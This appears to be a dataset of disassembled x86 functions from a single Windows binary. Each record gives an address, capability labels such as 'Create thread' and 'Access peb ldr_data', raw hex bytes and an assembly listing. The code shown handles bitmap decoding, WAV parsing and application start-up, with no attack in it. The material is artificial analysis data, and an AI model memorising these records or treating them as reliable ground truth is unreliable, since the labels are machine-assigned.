"mov byte [edx + ecx], bl",
"test ax, ax",
"je 0x455c52",
"xor ecx, ecx",
"and eax, 0xffff",
"lea eax, [eax + eax*2]",
"mov bl, byte [ebp + eax*2]",
"lea edx, [ebp + eax*2]",
"test byte [esi + 0x3d], 0x40",
"mov eax, dword [esi + 0x78]",
"je 0x455c0d",
"cmp eax, dword [esi + 0x54]",
"jne 0x455bf3",
"mov eax, dword [esi + 0x64]",
"mov dword [esi + 0x78], ecx",
"cmp eax, 1",
"jne 0x455bc1",
"add dword [esi + 0x68], edi",
"cmp eax, 2",
"jne 0x455bc9",
"add dword [esi + 0x68], edi",
"cmp eax, 3",
"jne 0x455bd2",
"add dword [esi + 0x68], 4",
"cmp eax, 4",
"jne 0x455bdb",
"add dword [esi + 0x68], 2",
"mov ecx, dword [esi + 0x68]",
"cmp ecx, dword [esi + 0x58]",
"jl 0x455bf3",
"lea ecx, [eax + 1]",
"mov eax, 0x10",
"sar eax, cl",
"mov dword [esi + 0x64], ecx",
"mov dword [esi + 0x68], eax",
"mov eax, dword [esi + 0x6c]",
"mov ecx, dword [esi + 0x78]",
"imul eax, dword [esi + 0x68]",
"add eax, ecx",
"mov ecx, dword [esi + 0xac]",
"mov byte [ecx + eax], bl",
"mov ecx, dword [esi + 0x78]",
"jmp 0x455c28",
"cmp eax, dword [esi + 0x54]",
"jne 0x455c1c",
"mov eax, dword [esi + 0x7c]",
"mov dword [esi + 0x78], ecx",
"inc eax",
"mov dword [esi + 0x7c], eax",
"mov eax, dword [esi + 0x7c]",
"mov ecx, dword [esi + 0x78]",
"imul eax, dword [esi + 0x6c]",
"add eax, ecx",
"inc ecx",
"mov dword [esi + 0x78], ecx",
"mov ecx, dword [esi + 0x98]",
"cmp eax, ecx",
"jg 0x455c3f",
"mov ecx, dword [esi + 0xac]",
"mov byte [ecx + eax], bl",
"mov ax, word [edx + 4]",
"xor ecx, ecx",
"cmp ax, cx",
"jne 0x455b95",
"mov ebx, dword [esp + 0x34]",
"mov al, byte [esi + 0x3d]",
"mov edx, dword [esi + 0x78]",
"test al, 0x40",
"mov eax, dword [esi + 0x54]",
"je 0x455cc3",
"cmp edx, eax",
"jne 0x455ca9",
"mov eax, dword [esi + 0x64]",
"mov dword [esi + 0x78], 0",
"cmp eax, 1",
"jne 0x455c75",
"add dword [esi + 0x68], edi",
"cmp eax, 2",
"jne 0x455c7d",
"add dword [esi + 0x68], edi",
"cmp eax, 3",
"jne 0x455c86",
"add dword [esi + 0x68], 4",
"cmp eax, 4",
"jne 0x455c8f",
"add dword [esi + 0x68], 2",
"mov ecx, dword [esi + 0x68]",
"mov edx, dword [esi + 0x58]",
"cmp ecx, edx",
"jl 0x455ca9",
"lea ecx, [eax + 1]",
"mov edx, 0x10",
"sar edx, cl",
"mov dword [esi + 0x64], ecx",
"mov dword [esi + 0x68], edx",
"mov eax, dword [esi + 0x6c]",
"mov edx, dword [esi + 0x78]",
"imul eax, dword [esi + 0x68]",
"mov ecx, dword [esi + 0xac]",
"add eax, edx",
"mov byte [ecx + eax], bl",
"mov ecx, dword [esi + 0x78]",
"jmp 0x455ce1",
"cmp edx, eax",
"jne 0x455cd5",
"mov eax, dword [esi + 0x7c]",
"mov dword [esi + 0x78], 0",
"inc eax",
"mov dword [esi + 0x7c], eax",
"mov eax, dword [esi + 0x7c]",
"mov ecx, dword [esi + 0x78]",
"imul eax, dword [esi + 0x6c]",
"add eax, ecx",
"inc ecx",
"mov dword [esi + 0x78], ecx",
"mov ecx, dword [esi + 0x98]",
"cmp eax, ecx",
"jg 0x455cf8",
"mov ecx, dword [esi + 0xac]",
"mov byte [ecx + eax], bl",
"mov edx, dword [esp + 0x18]",
"mov cx, word [esp + 0x20]",
"lea eax, [edx + edx*2]",
"inc edx",
"mov dword [esp + 0x18], edx",
"lea eax, [ebp + eax*2]",
"mov byte [eax], bl",
"mov word [eax + 2], cx",
"mov ecx, dword [esi + 0x40]",
"mov eax, 1",
"shl eax, cl",
"cmp edx, eax",
"jne 0x455d25",
"inc ecx",
"mov dword [esi + 0x40], ecx",
"mov ecx, dword [esi + 0x40]",
"mov eax, 0xc",
"cmp ecx, eax",
"jbe 0x455a79",
"mov ecx, dword [esp + 0x38]",
"mov dword [esi + 0x40], eax",
"mov dword [esp + 0x20], ecx",
"jmp 0x455424",
"mov edx, dword [esp + 0x24]",
"push edx",
"call fcn.004ac85e",
"add esp, 4",
"xor eax, eax",
"pop edi",
"pop esi",
"pop ebp",
"pop ebx",
"add esp, 0x34",
"ret",
"mov eax, dword [esp + 0x24]",
"push eax",
"call fcn.004ac85e",
"add esp, 4",
"xor eax, eax",
"pop edi",
"pop esi",
"pop ebp",
"pop ebx",
"add esp, 0x34",
"ret",
"mov ecx, dword [esp + 0x24]",
"push ecx",
"call fcn.004ac85e",
"add esp, 4",
"xor eax, eax",
"pop edi",
"pop esi",
"pop ebp",
"pop ebx",
"add esp, 0x34",
"ret",
"cmp dword [esi + 0xe8], 1",
"jne 0x455dba",
"mov eax, dword [esi + 0x98]",
"mov edx, dword [esp + 0x24]",
"add eax, 0x6428",
"xor edi, edi",
"mov dword [esi + 0xf0], eax",
"mov eax, edi",
"mov dword [esi + 0xec], edx",
"pop edi",
"pop esi",
"pop ebp",
"pop ebx",
"add esp, 0x34",
"ret",
"mov ebx, dword [esp + 0x24]",
"mov ecx, dword [esi + 0xac]",
"mov edx, dword [esi + 0xa4]",
"push 0",
"push ebx",
"push ecx",
"push 4",
"push ebx",
"push edx",
"call dword [sym.imp.GDI32.dll_CreateDIBitmap]",
"mov ebp, dword [esi + 0xb4]",
"mov edx, dword [esi + 0x94]",
"inc ebp",
"inc edx",
"push ebx",
"mov edi, eax",
"mov dword [esi + 0xb4], ebp",
"mov dword [esi + 0x94], edx",
"call fcn.004ac85e",
"add esp, 4",
"mov eax, edi",
"pop edi",
"pop esi",
"pop ebp",
"pop ebx",
"add esp, 0x34",
"ret"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x457260
|
[
"Create thread",
"Resume thread"
] |
8b44240883ec0883f824535556570f8c09010000bfe4ee4f0083c9ff33c08b74241cf2aef7d1495168e4ee4f0056e8ad1f030083c40c85c00f85df0000008b4604bfdcee4f008944241483c9ff33c083c608f2aef7d1495168dcee4f0056e87d1f030083c40c85c00f85af0000008b4c241c33db33f633ed8d790c897c24108b57046a0468d4ee4f005789542428e84d1f030083c40c85c0750985f68d5f087539eb1f6a0468ccee4f0057e8301f030083c40c85c0750b8b6c241c8d770885db751c8b44241c8b5424108d7c07088b4424148bcf2bca3bc872a585db743f85f6743b85ed76376a4ce8e8540500894424248968088b5424248b420850e8763203008b4c242883c40889018b4424208b3885ff751350e8e454050083c4045f5e5d33c05b83c408c38bcd6a148bd168003c0000c1e902f3a58bca83e103f3a48b4424288b4c242c8948488b542428c7421c00000000e897fcffff8b4c242883c4086a006a006a016a0089410cff158cf34b008b5424206a006a146a146a0089422cff15e8f24b008b4c24208941288b542420c74214000000008b442420c74010140000008b4c242083c13051ff1540f34b008b44242068907845005083c0045350e89bfcffff8b44243083c410bf040000008d502452575068407645006a006a00ff1588f34b008b4c242068907d5100894120ff15f4f24b00a1b07d51008b15b47d51002bd08bf0c1fa0283fa010f83f00000008b15ac7d510085d274158bc82bcac1f90283f90176098bc82bcac1f902eb05b90100000085d2750433c0eb052bc2c1f80203c185c08944241c7d0233c08d14850000000052e8785305008b3dac7d510083c4048be83bfe8bdd74145753e8cbb0040083c70483c40883c3043bfe75ec8d4424205053e8b3b004008b3db07d510083c40883c3043bf774145653e89cb0040083c60483c40883c3043bf775ec8b0db07d51008b15ac7d51005152b9a87d5100e8c7030000a1ac7d510050e82a5305008b4c242083c4048d548d00b9a87d51008915b47d5100e8810300008d448504892dac7d5100a3b07d5100e99d0000008bc82bcec1f90283f901734e8d5604b9a87d5100525056e8517b04008d442420ba0100000050a1b07d51008bc82bcec1f9022bd1b9a87d51005250e85d7b04008b0db07d51008bc63bf1744b8b542420891003c73bc175f4eb3d505083c0fcb9a87d510050e8037b0400a1b07d51008bc883c0fc3bf0740c2bc72bcf3bc68b10891175f48d46043bf0740c8b4c2420890e03f73bf075f4013db07d510068907d5100ff15f8f24b008b5424208b422050ff15ecf24b008b4c24206a006a148b512852ff15f0f24b005f5e5db8010000005b83c408c3
|
[
"mov eax, dword [esp + 8]",
"sub esp, 8",
"cmp eax, 0x24",
"push ebx",
"push ebp",
"push esi",
"push edi",
"jl 0x45737d",
"mov edi, str.RIFF",
"or ecx, 0xffffffff",
"xor eax, eax",
"mov esi, dword [esp + 0x1c]",
"repne scasb al, byte es:[edi]",
"not ecx",
"dec ecx",
"push ecx",
"push str.RIFF",
"push esi",
"call fcn.00489240",
"add esp, 0xc",
"test eax, eax",
"jne 0x45737d",
"mov eax, dword [esi + 4]",
"mov edi, 0x4feedc",
"mov dword [esp + 0x14], eax",
"or ecx, 0xffffffff",
"xor eax, eax",
"add esi, 8",
"repne scasb al, byte es:[edi]",
"not ecx",
"dec ecx",
"push ecx",
"push 0x4feedc",
"push esi",
"call fcn.00489240",
"add esp, 0xc",
"test eax, eax",
"jne 0x45737d",
"mov ecx, dword [esp + 0x1c]",
"xor ebx, ebx",
"xor esi, esi",
"xor ebp, ebp",
"lea edi, [ecx + 0xc]",
"mov dword [esp + 0x10], edi",
"mov edx, dword [edi + 4]",
"push 4",
"push str.fmt",
"push edi",
"mov dword [esp + 0x28], edx",
"call fcn.00489240",
"add esp, 0xc",
"test eax, eax",
"jne 0x457303",
"test esi, esi",
"lea ebx, [edi + 8]",
"jne 0x45733a",
"jmp 0x457322",
"push 4",
"push 0x4feecc",
"push edi",
"call fcn.00489240",
"add esp, 0xc",
"test eax, eax",
"jne 0x457322",
"mov ebp, dword [esp + 0x1c]",
"lea esi, [edi + 8]",
"test ebx, ebx",
"jne 0x45733e",
"mov eax, dword [esp + 0x1c]",
"mov edx, dword [esp + 0x10]",
"lea edi, [edi + eax + 8]",
"mov eax, dword [esp + 0x14]",
"mov ecx, edi",
"sub ecx, edx",
"cmp ecx, eax",
"jb 0x4572df",
"test ebx, ebx",
"je 0x45737d",
"test esi, esi",
"je 0x45737d",
"test ebp, ebp",
"jbe 0x45737d",
"push 0x4c",
"call fcn.004ac835",
"mov dword [esp + 0x24], eax",
"mov dword [eax + 8], ebp",
"mov edx, dword [esp + 0x24]",
"mov eax, dword [edx + 8]",
"push eax",
"call fcn.0048a5d7",
"mov ecx, dword [esp + 0x28]",
"add esp, 8",
"mov dword [ecx], eax",
"mov eax, dword [esp + 0x20]",
"mov edi, dword [eax]",
"test edi, edi",
"jne 0x457387",
"push eax",
"call fcn.004ac85e",
"add esp, 4",
"pop edi",
"pop esi",
"pop ebp",
"xor eax, eax",
"pop ebx",
"add esp, 8",
"ret",
"mov ecx, ebp",
"push 0x14",
"mov edx, ecx",
"push 0x3c00",
"shr ecx, 2",
"rep movsd dword es:[edi], dword [esi]",
"mov ecx, edx",
"and ecx, 3",
"rep movsb byte es:[edi], byte [esi]",
"mov eax, dword [esp + 0x28]",
"mov ecx, dword [esp + 0x2c]",
"mov dword [eax + 0x48], ecx",
"mov edx, dword [esp + 0x28]",
"mov dword [edx + 0x1c], 0",
"call fcn.00457050",
"mov ecx, dword [esp + 0x28]",
"add esp, 8",
"push 0",
"push 0",
"push 1",
"push 0",
"mov dword [ecx + 0xc], eax",
"call dword [sym.imp.KERNEL32.dll_CreateEventA]",
"mov edx, dword [esp + 0x20]",
"push 0",
"push 0x14",
"push 0x14",
"push 0",
"mov dword [edx + 0x2c], eax",
"call dword [sym.imp.KERNEL32.dll_CreateSemaphoreA]",
"mov ecx, dword [esp + 0x20]",
"mov dword [ecx + 0x28], eax",
"mov edx, dword [esp + 0x20]",
"mov dword [edx + 0x14], 0",
"mov eax, dword [esp + 0x20]",
"mov dword [eax + 0x10], 0x14",
"mov ecx, dword [esp + 0x20]",
"add ecx, 0x30",
"push ecx",
"call dword [sym.imp.KERNEL32.dll_InitializeCriticalSection]",
"mov eax, dword [esp + 0x20]",
"push 0x457890",
"push eax",
"add eax, 4",
"push ebx",
"push eax",
"call fcn.004570c0",
"mov eax, dword [esp + 0x30]",
"add esp, 0x10",
"mov edi, 4",
"lea edx, [eax + 0x24]",
"push edx",
"push edi",
"push eax",
"push 0x457640",
"push 0",
"push 0",
"call dword [sym.imp.KERNEL32.dll_CreateThread]",
"mov ecx, dword [esp + 0x20]",
"push 0x517d90",
"mov dword [ecx + 0x20], eax",
"call dword [sym.imp.KERNEL32.dll_EnterCriticalSection]",
"mov eax, dword [0x517db0]",
"mov edx, dword [0x517db4]",
"sub edx, eax",
"mov esi, eax",
"sar edx, 2",
"cmp edx, 1",
"jae 0x457563",
"mov edx, dword [0x517dac]",
"test edx, edx",
"je 0x457492",
"mov ecx, eax",
"sub ecx, edx",
"sar ecx, 2",
"cmp ecx, 1",
"jbe 0x457492",
"mov ecx, eax",
"sub ecx, edx",
"sar ecx, 2",
"jmp 0x457497",
"mov ecx, 1",
"test edx, edx",
"jne 0x45749f",
"xor eax, eax",
"jmp 0x4574a4",
"sub eax, edx",
"sar eax, 2",
"add eax, ecx",
"test eax, eax",
"mov dword [esp + 0x1c], eax",
"jge 0x4574b0",
"xor eax, eax",
"lea edx, [eax*4]",
"push edx",
"call fcn.004ac835",
"mov edi, dword [0x517dac]",
"add esp, 4",
"mov ebp, eax",
"cmp edi, esi",
"mov ebx, ebp",
"je 0x4574e2",
"push edi",
"push ebx",
"call fcn.004a25a0",
"add edi, 4",
"add esp, 8",
"add ebx, 4",
"cmp edi, esi",
"jne 0x4574ce",
"lea eax, [esp + 0x20]",
"push eax",
"push ebx",
"call fcn.004a25a0",
"mov edi, dword [0x517db0]",
"add esp, 8",
"add ebx, 4",
"cmp esi, edi",
"je 0x457511",
"push esi",
"push ebx",
"call fcn.004a25a0",
"add esi, 4",
"add esp, 8",
"add ebx, 4",
"cmp esi, edi",
"jne 0x4574fd",
"mov ecx, dword [0x517db0]",
"mov edx, dword [0x517dac]",
"push ecx",
"push edx",
"mov ecx, 0x517da8",
"call fcn.004578f0",
"mov eax, dword [0x517dac]",
"push eax",
"call fcn.004ac85e",
"mov ecx, dword [esp + 0x20]",
"add esp, 4",
"lea edx, [ebp + ecx*4]",
"mov ecx, 0x517da8",
"mov dword [0x517db4], edx",
"call fcn.004578d0",
"lea eax, [ebp + eax*4 + 4]",
"mov dword [0x517dac], ebp",
"mov dword [0x517db0], eax",
"jmp 0x457600",
"mov ecx, eax",
"sub ecx, esi",
"sar ecx, 2",
"cmp ecx, 1",
"jae 0x4575bd",
"lea edx, [esi + 4]",
"mov ecx, 0x517da8",
"push edx",
"push eax",
"push esi",
"call fcn.0049f0d0",
"lea eax, [esp + 0x20]",
"mov edx, 1",
"push eax",
"mov eax, dword [0x517db0]",
"mov ecx, eax",
"sub ecx, esi",
"sar ecx, 2",
"sub edx, ecx",
"mov ecx, 0x517da8",
"push edx",
"push eax",
"call fcn.0049f100",
"mov ecx, dword [0x517db0]",
"mov eax, esi",
"cmp esi, ecx",
"je 0x4575fa",
"mov edx, dword [esp + 0x20]",
"mov dword [eax], edx",
"add eax, edi",
"cmp eax, ecx",
"jne 0x4575af",
"jmp 0x4575fa",
"push eax",
"push eax",
"add eax, 0xfffffffc",
"mov ecx, 0x517da8",
"push eax",
"call fcn.0049f0d0",
"mov eax, dword [0x517db0]",
"mov ecx, eax",
"add eax, 0xfffffffc",
"cmp esi, eax",
"je 0x4575e7",
"sub eax, edi",
"sub ecx, edi",
"cmp eax, esi",
"mov edx, dword [eax]",
"mov dword [ecx], edx",
"jne 0x4575db",
"lea eax, [esi + 4]",
"cmp esi, eax",
"je 0x4575fa",
"mov ecx, dword [esp + 0x20]",
"mov dword [esi], ecx",
"add esi, edi",
"cmp esi, eax",
"jne 0x4575ee",
"add dword [0x517db0], edi",
"push 0x517d90",
"call dword [sym.imp.KERNEL32.dll_LeaveCriticalSection]",
"mov edx, dword [esp + 0x20]",
"mov eax, dword [edx + 0x20]",
"push eax",
"call dword [sym.imp.KERNEL32.dll_ResumeThread]",
"mov ecx, dword [esp + 0x20]",
"push 0",
"push 0x14",
"mov edx, dword [ecx + 0x28]",
"push edx",
"call dword [sym.imp.KERNEL32.dll_ReleaseSemaphore]",
"pop edi",
"pop esi",
"pop ebp",
"mov eax, 1",
"pop ebx",
"add esp, 8",
"ret"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x457b10
|
[
"Set current directory"
] |
558bec6aff6813be4b0064a100000000506489250000000081ecac0100005356578bd98965f0895decff1560f34b00898318040000a1b0f74b008983c40000008b0db4f74b008b8310040000898bc80000008b15b8f74b004285c08993cc00000075126a00ff15a0f74b00c78310040000010000008d8548feffff6804010000506a00ff1528f34b008d8d48feffff6a5c51e8403203008bf883c40885ff741b8db3d00000008d9548feffff528bcec60700e86a5005004757eb148db3d00000008bcee8a74e05008d8548feffff508d8bd4000000e8475005008b3656ff15b0f34b006802104000680010400068001040008d8b7c030000e8e37afeff6802104000680010400068001040008d8b90030000e8c97afeff6802104000680010400068001040008d8bc4030000e8af7afeff68007f00006a00ff15fcf54b006a006a006a006a006a006a006a006a006824b250006a006a058bf0ff1580f04b0050566a00e8967405005068800000008d8bd4030000e8a06d0500ff152cf34b00898334020000a1c4f74b0085c076298b0dc0f74b008db398010000518bcee8feb8fbff8b15c4f74b00a1c0f74b0003c28bce50e8e9b8fbff8b1dd8f74b0085db0f8ea00000008b7dec8d349d00000000566a008d8f70010000e8a3bdfbff566a008d8f84010000e895bdfbff81c748010000566a008bcfe885bdfbff8b4dec5681c15c0100006a00e874bdfbff33c085db7e228b15dcf74b0085c08b0c827c108b5710c1ea023bc27d068b5708890c82403bc37cde33c085db7e2b8b0de0f74b0085c08b0c817c198b55ec81c25c0100008b7210c1ee023bc67d068b5208890c82403bc37cd58b0dd0f74b0033ff3bcf7e6033f63bcf7e28a1d4f74b008b04b03bc774178b40783bc774105768b0cd42006a01ffd08b0dd0f74b00463bf17cd88b75ec8b15d4f74b00c1e10251528d8e20010000e8c8bcfbffa1d0f74b008d0c850000000051578d8e34010000e8afbcfbff393dccf74b000f86550200008d4dc8e82bb5fbff8b55ecc745c08cf64d008955c48d4db8897dfce87952050068000400008d4d90c645fc02e8cac30500a1ccf74b008b0dc8f74b005750b303518d4d90885dfce8fbc305005768001000008d55906a01528d8d4cffffffe879bb05008d854cffffff8d4dc050c645fc04e81d0bfdff8d8d4cffffffe8bfbc05008d8d4cffffff885dfce829bc05008d4d90c645fc02e8e9c30500897dfce8345205008b0dbcf74b008b45d88b75d0894de08bc8c1e903f7d81bc023c63bcf8d04880f8ee70000008945dc894de48b0033db8b481885c9894de80f8eb90000008d78146a00538bcfe8b6f8fcff538bcf8bf0e8dc00fdff83f801753883c61856e80ebefbff03f056e806befbff8d74060c56e8fcbdfbff03f083c40c8b0683f8ff74098b55e003c28906eb61c70600000000eb5983c61856e8d6bdfbff03f056e8cebdfbff8b4c061c8d44061c8b5488048d4488048d74020456e8b4bdfbff8b4c300c8d44300c83c40c83c00885c97e1c8b1083faff74098b75e003d68910eb06c7000000000083c0084975e48b45e8433bd80f8c4affffff8b45dc8b4de483c004498945dc894de40f851fffffff8b4dec8d45c05081c104010000e892fffcff8d4dc8e86ab5fbffc745c08cf64d008d4dc0c745fc08000000e8f408fdffc745c098f64d00c745fc09000000eb488d4dc8e8f4b4fbff8d4dc8c745fcffffffffc745c8a8cf4d00e8deb4fbff8b4df45f5e64890d000000005b8be55dc3
|
[
"push ebp",
"mov ebp, esp",
"push 0xffffffffffffffff",
"push 0x4bbe13",
"mov eax, dword fs:[0]",
"push eax",
"mov dword fs:[0], esp",
"sub esp, 0x1ac",
"push ebx",
"push esi",
"push edi",
"mov ebx, ecx",
"mov dword [ebp - 0x10], esp",
"mov dword [ebp - 0x14], ebx",
"call dword [sym.imp.KERNEL32.dll_GetProcessHeap]",
"mov dword [ebx + 0x418], eax",
"mov eax, dword [0x4bf7b0]",
"mov dword [ebx + 0xc4], eax",
"mov ecx, dword [0x4bf7b4]",
"mov eax, dword [ebx + 0x410]",
"mov dword [ebx + 0xc8], ecx",
"mov edx, dword [0x4bf7b8]",
"inc edx",
"test eax, eax",
"mov dword [ebx + 0xcc], edx",
"jne 0x457b85",
"push 0",
"call dword [sym.imp.ole32.dll_OleInitialize]",
"mov dword [ebx + 0x410], 1",
"lea eax, [ebp - 0x1b8]",
"push 0x104",
"push eax",
"push 0",
"call dword [sym.imp.KERNEL32.dll_GetModuleFileNameA]",
"lea ecx, [ebp - 0x1b8]",
"push 0x5c",
"push ecx",
"call fcn.0048ade7",
"mov edi, eax",
"add esp, 8",
"test edi, edi",
"je 0x457bcb",
"lea esi, [ebx + 0xd0]",
"lea edx, [ebp - 0x1b8]",
"push edx",
"mov ecx, esi",
"mov byte [edi], 0",
"call fcn.004acc31",
"inc edi",
"push edi",
"jmp 0x457bdf",
"lea esi, [ebx + 0xd0]",
"mov ecx, esi",
"call fcn.004aca7f",
"lea eax, [ebp - 0x1b8]",
"push eax",
"lea ecx, [ebx + 0xd4]",
"call fcn.004acc31",
"mov esi, dword [esi]",
"push esi",
"call dword [sym.imp.KERNEL32.dll_SetCurrentDirectoryA]",
"push 0x401002",
"push section..text",
"push section..text",
"lea ecx, [ebx + 0x37c]",
"call fcn.0043f6f0",
"push 0x401002",
"push section..text",
"push section..text",
"lea ecx, [ebx + 0x390]",
"call fcn.0043f6f0",
"push 0x401002",
"push section..text",
"push section..text",
"lea ecx, [ebx + 0x3c4]",
"call fcn.0043f6f0",
"push 0x7f00",
"push 0",
"call dword [sym.imp.USER32.dll_LoadCursorA]",
"push 0",
"push 0",
"push 0",
"push 0",
"push 0",
"push 0",
"push 0",
"push 0",
"push 0x50b224",
"push 0",
"push 5",
"mov esi, eax",
"call dword [sym.imp.GDI32.dll_GetStockObject]",
"push eax",
"push esi",
"push 0",
"call fcn.004af10e",
"push eax",
"push 0x80",
"lea ecx, [ebx + 0x3d4]",
"call fcn.004aea29",
"call dword [sym.imp.KERNEL32.dll_GetCurrentThreadId]",
"mov dword [ebx + 0x234], eax",
"mov eax, dword [0x4bf7c4]",
"test eax, eax",
"jbe 0x457cc7",
"mov ecx, dword [str.http:__chs.reg.qq.com_]",
"lea esi, [ebx + 0x198]",
"push ecx",
"mov ecx, esi",
"call fcn.004135b0",
"mov edx, dword [0x4bf7c4]",
"mov eax, dword [str.http:__chs.reg.qq.com_]",
"add eax, edx",
"mov ecx, esi",
"push eax",
"call fcn.004135b0",
"mov ebx, dword [0x4bf7d8]",
"test ebx, ebx",
"jle 0x457d75",
"mov edi, dword [ebp - 0x14]",
"lea esi, [ebx*4]",
"push esi",
"push 0",
"lea ecx, [edi + 0x170]",
"call fcn.00413a90",
"push esi",
"push 0",
"lea ecx, [edi + 0x184]",
"call fcn.00413a90",
"add edi, 0x148",
"push esi",
"push 0",
"mov ecx, edi",
"call fcn.00413a90",
"mov ecx, dword [ebp - 0x14]",
"push esi",
"add ecx, 0x15c",
"push 0",
"call fcn.00413a90",
"xor eax, eax",
"test ebx, ebx",
"jle 0x457d44",
"mov edx, dword [0x4bf7dc]",
"test eax, eax",
"mov ecx, dword [edx + eax*4]",
"jl 0x457d3f",
"mov edx, dword [edi + 0x10]",
"shr edx, 2",
"cmp eax, edx",
"jge 0x457d3f",
"mov edx, dword [edi + 8]",
"mov dword [edx + eax*4], ecx",
"inc eax",
"cmp eax, ebx",
"jl 0x457d22",
"xor eax, eax",
"test ebx, ebx",
"jle 0x457d75",
"mov ecx, dword [0x4bf7e0]",
"test eax, eax",
"mov ecx, dword [ecx + eax*4]",
"jl 0x457d70",
"mov edx, dword [ebp - 0x14]",
"add edx, 0x15c",
"mov esi, dword [edx + 0x10]",
"shr esi, 2",
"cmp eax, esi",
"jge 0x457d70",
"mov edx, dword [edx + 8]",
"mov dword [edx + eax*4], ecx",
"inc eax",
"cmp eax, ebx",
"jl 0x457d4a",
"mov ecx, dword [0x4bf7d0]",
"xor edi, edi",
"cmp ecx, edi",
"jle 0x457de1",
"xor esi, esi",
"cmp ecx, edi",
"jle 0x457daf",
"mov eax, dword [0x4bf7d4]",
"mov eax, dword [eax + esi*4]",
"cmp eax, edi",
"je 0x457daa",
"mov eax, dword [eax + 0x78]",
"cmp eax, edi",
"je 0x457daa",
"push edi",
"push 0x42cdb0",
"push 1",
"call eax",
"mov ecx, dword [0x4bf7d0]",
"inc esi",
"cmp esi, ecx",
"jl 0x457d87",
"mov esi, dword [ebp - 0x14]",
"mov edx, dword [0x4bf7d4]",
"shl ecx, 2",
"push ecx",
"push edx",
"lea ecx, [esi + 0x120]",
"call fcn.00413a90",
"mov eax, dword [0x4bf7d0]",
"lea ecx, [eax*4]",
"push ecx",
"push edi",
"lea ecx, [esi + 0x134]",
"call fcn.00413a90",
"cmp dword [0x4bf7cc], edi",
"jbe 0x458042",
"lea ecx, [ebp - 0x38]",
"call fcn.00413320",
"mov edx, dword [ebp - 0x14]",
"mov dword [ebp - 0x40], 0x4df68c",
"mov dword [ebp - 0x3c], edx",
"lea ecx, [ebp - 0x48]",
"mov dword [ebp - 4], edi",
"call fcn.004ad086",
"push 0x400",
"lea ecx, [ebp - 0x70]",
"mov byte [ebp - 4], 2",
"call fcn.004b41e8",
"mov eax, dword [0x4bf7cc]",
"mov ecx, dword [0x4bf7c8]",
"push edi",
"push eax",
"mov bl, 3",
"push ecx",
"lea ecx, [ebp - 0x70]",
"mov byte [ebp - 4], bl",
"call fcn.004b4234",
"push edi",
"push 0x1000",
"lea edx, [ebp - 0x70]",
"push 1",
"push edx",
"lea ecx, [ebp - 0xb4]",
"call fcn.004b39c9",
"lea eax, [ebp - 0xb4]",
"lea ecx, [ebp - 0x40]",
"push eax",
"mov byte [ebp - 4], 4",
"call fcn.00428980",
"lea ecx, [ebp - 0xb4]",
"call fcn.004b3b2d",
"lea ecx, [ebp - 0xb4]",
"mov byte [ebp - 4], bl",
"call fcn.004b3aa5",
"lea ecx, [ebp - 0x70]",
"mov byte [ebp - 4], 2",
"call fcn.004b4271",
"mov dword [ebp - 4], edi",
"call fcn.004ad0c4",
"mov ecx, dword [0x4bf7bc]",
"mov eax, dword [ebp - 0x28]",
"mov esi, dword [ebp - 0x30]",
"mov dword [ebp - 0x20], ecx",
"mov ecx, eax",
"shr ecx, 3",
"neg eax",
"sbb eax, eax",
"and eax, esi",
"cmp ecx, edi",
"lea eax, [eax + ecx*4]",
"jle 0x457f9c",
"mov dword [ebp - 0x24], eax",
"mov dword [ebp - 0x1c], ecx",
"mov eax, dword [eax]",
"xor ebx, ebx",
"mov ecx, dword [eax + 0x18]",
"test ecx, ecx",
"mov dword [ebp - 0x18], ecx",
"jle 0x457f86",
"lea edi, [eax + 0x14]",
"push 0",
"push ebx",
"mov ecx, edi",
"call fcn.00427790",
"push ebx",
"mov ecx, edi",
"mov esi, eax",
"call fcn.00427fc0",
"cmp eax, 1",
"jne 0x457f21",
"add esi, 0x18",
"push esi",
"call fcn.00413d00",
"add esi, eax",
"push esi",
"call fcn.00413d00",
"lea esi, [esi + eax + 0xc]",
"push esi",
"call fcn.00413d00",
"add esi, eax",
"add esp, 0xc",
"mov eax, dword [esi]",
"cmp eax, 0xffffffff",
"je 0x457f19",
"mov edx, dword [ebp - 0x20]",
"add eax, edx",
"mov dword [esi], eax",
"jmp 0x457f7a",
"mov dword [esi], 0",
"jmp 0x457f7a",
"add esi, 0x18",
"push esi",
"call fcn.00413d00",
"add esi, eax",
"push esi",
"call fcn.00413d00",
"mov ecx, dword [esi + eax + 0x1c]",
"lea eax, [esi + eax + 0x1c]",
"mov edx, dword [eax + ecx*4 + 4]",
"lea eax, [eax + ecx*4 + 4]",
"lea esi, [edx + eax + 4]",
"push esi",
"call fcn.00413d00",
"mov ecx, dword [eax + esi + 0xc]",
"lea eax, [eax + esi + 0xc]",
"add esp, 0xc",
"add eax, 8",
"test ecx, ecx",
"jle 0x457f7a",
"mov edx, dword [eax]",
"cmp edx, 0xffffffff",
"je 0x457f6e",
"mov esi, dword [ebp - 0x20]",
"add edx, esi",
"mov dword [eax], edx",
"jmp 0x457f74",
"mov dword [eax], 0",
"add eax, 8",
"dec ecx",
"jne 0x457f5e",
"mov eax, dword [ebp - 0x18]",
"inc ebx",
"cmp ebx, eax",
"jl 0x457ed0",
"mov eax, dword [ebp - 0x24]",
"mov ecx, dword [ebp - 0x1c]",
"add eax, 4",
"dec ecx",
"mov dword [ebp - 0x24], eax",
"mov dword [ebp - 0x1c], ecx",
"jne 0x457ebb",
"mov ecx, dword [ebp - 0x14]",
"lea eax, [ebp - 0x40]",
"push eax",
"add ecx, 0x104",
"call fcn.00427f40",
"lea ecx, [ebp - 0x38]",
"call fcn.00413520",
"mov dword [ebp - 0x40], 0x4df68c",
"lea ecx, [ebp - 0x40]",
"mov dword [ebp - 4], 8",
"call fcn.004288c0",
"mov dword [ebp - 0x40], 0x4df698",
"mov dword [ebp - 4], 9",
"jmp 0x458024",
"lea ecx, [ebp - 0x38]",
"call fcn.00413520",
"lea ecx, [ebp - 0x38]",
"mov dword [ebp - 4], 0xffffffff",
"mov dword [ebp - 0x38], 0x4dcfa8",
"call fcn.00413520",
"mov ecx, dword [ebp - 0xc]",
"pop edi",
"pop esi",
"mov dword fs:[0], ecx",
"pop ebx",
"mov esp, ebp",
"pop ebp",
"ret"
] |
f53a5abe6cd77afda63f23dd6f0e75472256e1f40737ab4e61eea0208fed039d
|
0x45b860
|
[
"Access peb ldr_data",
"Get number of processors"
] |
